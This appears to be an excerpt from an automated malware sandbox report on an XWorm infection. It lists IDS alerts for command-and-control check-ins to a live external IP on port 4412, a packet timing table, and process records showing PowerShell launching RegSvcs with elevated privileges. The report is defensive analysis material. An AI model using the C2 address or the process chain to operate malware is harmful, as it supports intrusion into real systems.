2025-01-26T10:37:07.432087+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:07.434211+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:11.273258+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:11.275725+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:23.070700+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:23.204297+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:31.646275+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:31.648147+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:31.767760+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:31.769145+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
2025-01-26T10:37:36.936336+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:43.523152+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.228 | 4412 | 192.168.2.5 | 49709 | TCP |
2025-01-26T10:37:43.537690+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49709 | 176.113.115.228 | 4412 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 26, 2025 10:34:16.473707914 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:16.478557110 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:16.478660107 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:16.746017933 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:16.750857115 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:28.544275999 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:28.549175978 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:28.769948006 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:28.814225912 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:28.819127083 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:36.918087959 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:36.961432934 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:40.337477922 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:40.342442036 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:40.555435896 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:40.558655024 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:40.563498974 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:52.133903980 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:52.138974905 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:52.350845098 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:34:52.357325077 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:34:52.362904072 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:03.930773973 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:03.937963009 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:04.163753033 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:04.166178942 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:04.171386003 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:06.917866945 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:06.961540937 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:15.727806091 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:15.732698917 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:15.963702917 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:15.967787027 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:15.972578049 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:25.430901051 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:25.435942888 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:25.633748055 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:25.638618946 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:25.653661966 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:25.655476093 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:25.706727028 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:25.854717016 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:25.864085913 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:25.868936062 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:26.383768082 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:26.388530970 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:26.619507074 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:26.643517017 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:26.648304939 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:31.258878946 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:31.263725042 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:31.488042116 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:31.490609884 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:31.495409012 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:31.508718014 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:31.513504982 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:31.901153088 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:31.946434975 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:31.951338053 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:36.906588078 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:36.961664915 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:40.899533987 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:40.904432058 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:41.125293016 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:41.127120018 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:41.133542061 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:52.698976040 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:52.704044104 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:52.921008110 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:52.923666000 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:52.928633928 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:56.337096930 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:56.342314959 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:56.558294058 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:35:56.564382076 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:35:56.569220066 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.212090015 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.217067003 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.321516991 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.326473951 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.352952003 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.357848883 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.415560007 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.420509100 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.438235044 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.442441940 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.490748882 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.524586916 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.529503107 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.562562943 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.564213037 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.610682011 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.688442945 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.689950943 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.694849968 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.811882973 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.820321083 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.825231075 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.934237003 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:03.942246914 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:03.947299004 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:06.915055990 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:06.961744070 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:08.633966923 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:08.639168978 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:08.711914062 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:08.716850042 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:08.851433039 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:08.852612019 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:08.857564926 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:08.857620955 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:08.862437963 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:08.974394083 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:08.976077080 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:08.980982065 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:09.104640961 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:09.106350899 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:09.111181021 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:09.290158033 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:09.295129061 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:09.576638937 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:09.578399897 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:09.583355904 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:21.087090015 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:21.092170954 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:22.245496988 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:22.254523993 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:22.255918980 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:22.256062031 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:22.256144047 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:22.256145000 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:22.256206989 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:22.256365061 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:22.257608891 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:22.257762909 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:22.262571096 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:22.472568035 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:22.474520922 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:22.481369019 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:24.180862904 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:24.186090946 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:24.397557974 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:24.399249077 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:24.404094934 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:34.337131023 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:34.342619896 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:34.555246115 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
Jan 26, 2025 10:36:34.559336901 CET | 49709 | 4412 | 192.168.2.5 | 176.113.115.228 |
Jan 26, 2025 10:36:34.564336061 CET | 4412 | 49709 | 176.113.115.228 | 192.168.2.5 |
| Field | Value |
|---|---|
| Target ID | 0 |
| Start time | 04:34:09 |
| Start date | 26/01/2025 |
| Path | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| Wow64 process (32bit) | false |
| Commandline | |
| Imagebase | 0x7ff7be880000 |
| File size | 452'608 bytes |
| MD5 hash | 04029E121A0CFA5991749937DD22A1D9 |
| Has elevated privileges | true |
| Has administrator privileges | true |
| Programmed in | C, C++ or other language |
| Yara matches | |
| Reputation | high |
| Has exited | true |

| Field | Value |
|---|---|
| Target ID | 1 |
| Start time | 04:34:09 |
| Start date | 26/01/2025 |
| Path | C:\Windows\System32\conhost.exe |
| Wow64 process (32bit) | false |
| Commandline | |
| Imagebase | 0x7ff6d64d0000 |
| File size | 862'208 bytes |
| MD5 hash | 0D698AF330FD17BEE3BF90011D49251D |
| Has elevated privileges | true |
| Has administrator privileges | true |
| Programmed in | C, C++ or other language |
| Reputation | high |
| Has exited | true |

| Field | Value |
|---|---|
| Target ID | 3 |
| Start time | 04:34:12 |
| Start date | 26/01/2025 |
| Path | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| Wow64 process (32bit) | true |
| Commandline | |
| Imagebase | 0xb50000 |
| File size | 45'984 bytes |
| MD5 hash | 9D352BC46709F0CB5EC974633A0C3C94 |
| Has elevated privileges | true |
| Has administrator privileges | true |
| Programmed in | C, C++ or other language |
| Yara matches | |
| Reputation | high |
| Has exited | true |

| Field | Value |
|---|---|
| Target ID | 4 |
| Start time | 04:34:12 |
| Start date | 26/01/2025 |
| Path | C:\Windows\System32\wermgr.exe |
| Wow64 process (32bit) | false |
| Commandline | |
| Imagebase | 0x7ff6070d0000 |
| File size | 229'728 bytes |
| MD5 hash | 74A0194782E039ACE1F7349544DC1CF4 |
| Has elevated privileges | true |
| Has administrator privileges | true |
| Programmed in | C, C++ or other language |
| Reputation | moderate |
| Has exited | true |

| Field | Value |
|---|---|
| Target ID | 11 |
| Start time | 04:37:43 |
| Start date | 26/01/2025 |
| Path | C:\Windows\SysWOW64\WerFault.exe |
| Wow64 process (32bit) | true |
| Commandline | |
| Imagebase | 0x590000 |
| File size | 483'680 bytes |
| MD5 hash | C31336C1EFC2CCB44B4326EA793040F2 |
| Has elevated privileges | true |
| Has administrator privileges | true |
| Programmed in | C, C++ or other language |
| Reputation | high |
| Has exited | true |